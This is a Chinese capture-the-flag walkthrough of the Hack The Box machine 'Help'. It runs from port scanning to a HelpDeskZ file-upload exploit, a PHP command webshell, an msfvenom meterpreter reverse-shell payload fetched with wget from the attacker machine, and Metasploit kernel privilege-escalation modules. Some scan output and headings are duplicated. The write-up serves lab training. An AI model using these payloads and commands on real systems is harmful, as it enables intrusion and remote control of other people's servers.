Help(File upload)

10.10.10.121

22/tcp   open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.6 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 e5:bb:4d:9c:de:af:6b:bf:ba:8c:22:7a:d8:d7:43:28 (RSA)
|   256 d5:b0:10:50:74:86:a3:9f:c5:53:6f:3b:4a:24:61:19 (ECDSA)
|_  256 e2:1b:88:d3:76:21:d4:1e:38:15:4a:81:11:b7:99:07 (ED25519)
80/tcp   open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
3000/tcp open  http    Node.js Express framework
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

10.10.10.121

22/tcp   open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.6 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 e5:bb:4d:9c:de:af:6b:bf:ba:8c:22:7a:d8:d7:43:28 (RSA)
|   256 d5:b0:10:50:74:86:a3:9f:c5:53:6f:3b:4a:24:61:19 (ECDSA)
|_  256 e2:1b:88:d3:76:21:d4:1e:38:15:4a:81:11:b7:99:07 (ED25519)
80/tcp   open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
3000/tcp open  http    Node.js Express framework
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

80 categories:
- vuln service

10.10.10.121

22/tcp   open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.6 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 e5:bb:4d:9c:de:af:6b:bf:ba:8c:22:7a:d8:d7:43:28 (RSA)
|   256 d5:b0:10:50:74:86:a3:9f:c5:53:6f:3b:4a:24:61:19 (ECDSA)
|_  256 e2:1b:88:d3:76:21:d4:1e:38:15:4a:81:11:b7:99:07 (ED25519)
80/tcp   open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
3000/tcp open  http    Node.js Express framework
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

80

访问10.10.10.121:80，Apache/2.4.18 (Ubuntu) ，默认配置页面

gobuster -u http://10.10.10.121:80 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

http://10.10.10.121/support/
页面上的登陆表单，有csrf参数，不允许爆破弱口令

换一个字典
apache-user-enum-1.0.txt
gobuster -u http://10.10.10.121:80 -w /usr/share/wordlists/dirbuster/apache-user-enum-1.0.txt

目录扫描

gobuster -u http://10.10.10.121:80/support/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

/uploads (Status: 301)
/css (Status: 301)
/includes (Status: 301)
存在上传目录，302跳转到apache默认配置页面

gobuster -u http://10.10.10.121/support/uploads -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

1 2	`/articles (Status: 301) /tickets (Status: 301)`

gobuster -u http://10.10.10.121/support/uploads/tickets -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

exp尝试

searchsploit help deskZ

HelpDeskZ <= v1.0.2 - Unauthenticated Shell Upload
HelpDeskZ < 1.0.2 - (Authenticated) SQL Injection / Unauthorized File Download

searchsploit -m exploits/php/webapps/40300.py
python 40300.py  http://10.10.10.121:80/support/ ports.txt
失败
python 40300.py http://10.10.10.121/support/uploads/tickets whale.php

连接错误
requests.exceptions.ConnectionError: HTTPConnectionPool(host='10.10.10.121', port=80): Max retries exceeded with url: /support/uploads/tickets/1cd2ed348346b00c48d3f78579d6431d.php (Caused by NewConnectionError('<urllib3.connection.HTTPConnection object at 0x7f0def11a290>: Failed to establish a new connection: [Errno 110] Connection timed out',))
searchsploit -m exploits/php/webapps/41200.py
需要一个可以登陆的口令

尝试文件上传

http://10.10.10.121/support/?v=submit_ticket&action=displayForm

尝试github的exp

wget https://raw.githubusercontent.com/trevlee/helpdeskz_exploit/master/exploit

python exploit

python exploit http://10.10.10.121/support/uploads/tickets whale.php

https://raw.githubusercontent.com/trevlee/helpdeskz_exploit/master/exploit

观察exp，是通过时间推算出上传的php脚本的名称，然后组合baseurl，查看状态码是否是200。

如果是200，说明上传成功。

首先上传一个php脚本，上传地址参考上述步骤“尝试文件上传”,内容为<?php echo(system($_GET["cmd"])); ?>

成功上传webshell

3000 port

10.10.10.121:3000
{"message":"Hi Shiv, To get access please find the credentials with given query"}

X-Powered-By: Express

searchsploit Express
searchsploit Node.js

nikto -h http://10.10.10.121:3000 > nikto.txt

gobuster -u http://10.10.10.121:3000 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
结果，没有发现任何存在目录

提权

信息搜集

cmd=uname+-a
Linux help 4.4.0-116-generic #140-Ubuntu SMP Mon Feb 12 21:23:04 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
64位linux，ubuntu

pwd
/var/www/html/support/uploads/tickets

cmd=cat+/home/help/user.txt

获得help用户的webshell，如果不会这一步，参考https://whale3070.github.io/tag/#/command%20execution

查看内核版本后，searchsploit linux 4.4.0，根据结果，值得尝试msf suggester。

生成64位msf回连载荷，上传

1 2	`msfvenom -p linux/x64/meterpreter_reverse_tcp LHOST=10.10.14.2 LPORT=6678 -f elf -o payload.elf python -m SimpleHTTPServer 8001`

攻击机webshell:

1 2	`wget http://10.10.14.2:8001/payload.elf -P /tmp chmod +x /tmp/payload.elf`

本地监听：

1 2	`msfconsole handler -H 10.10.14.2 -P 6678 -p linux/x64/meterpreter_reverse_tcp`

攻击机webshell: ./payload.elf

本地监听，成功回连msf payload:

use post/multi/recon/local_exploit_suggester
set SESSION 2

[+] 10.10.10.121 - exploit/linux/local/bpf_priv_esc: The target appears to be vulnerable.
[+] 10.10.10.121 - exploit/linux/local/bpf_sign_extension_priv_esc: The target appears to be vulnerable.
[+] 10.10.10.121 - exploit/linux/local/glibc_realpath_priv_esc: The target appears to be vulnerable.


use exploit/linux/local/bpf_priv_esc
set SESSION 2
set LHOST 10.10.14.2
set LPORT 6679
show options
run
失败

use exploit/linux/local/bpf_sign_extension_priv_esc
set payload linux/x64/meterpreter_reverse_tcp
set LHOST 10.10.14.2
set LPORT 6679
set SESSION 2
show options
run

training ``` | ssh-hostkey: |_http-server-header: Apache/2.4.18 (Ubuntu) Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel 10.10.10.121 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.6 (Ubuntu Linux; protocol 2.0) | 2048 e5:bb:4d:9c:de:af:6b:bf:ba:8c:22:7a:d8:d7:43:28 (RSA) | 256 d5:b0:10:50:74:86:a3:9f:c5:53:6f:3b:4a:24:61:19 (ECDSA) |_ 256 e2:1b:88:d3:76:21:d4:1e:38:15:4a:81:11:b7:99:07 (ED25519) 80/tcp open http Apache httpd 2.4.18 ((Ubuntu)) 3000/tcp open http Node.js Express framework

Tenten（sudo -l）上一篇

80

categories: - vuln service

80

目录扫描

exp尝试

3000 port

提权

信息搜集

categories:
- vuln service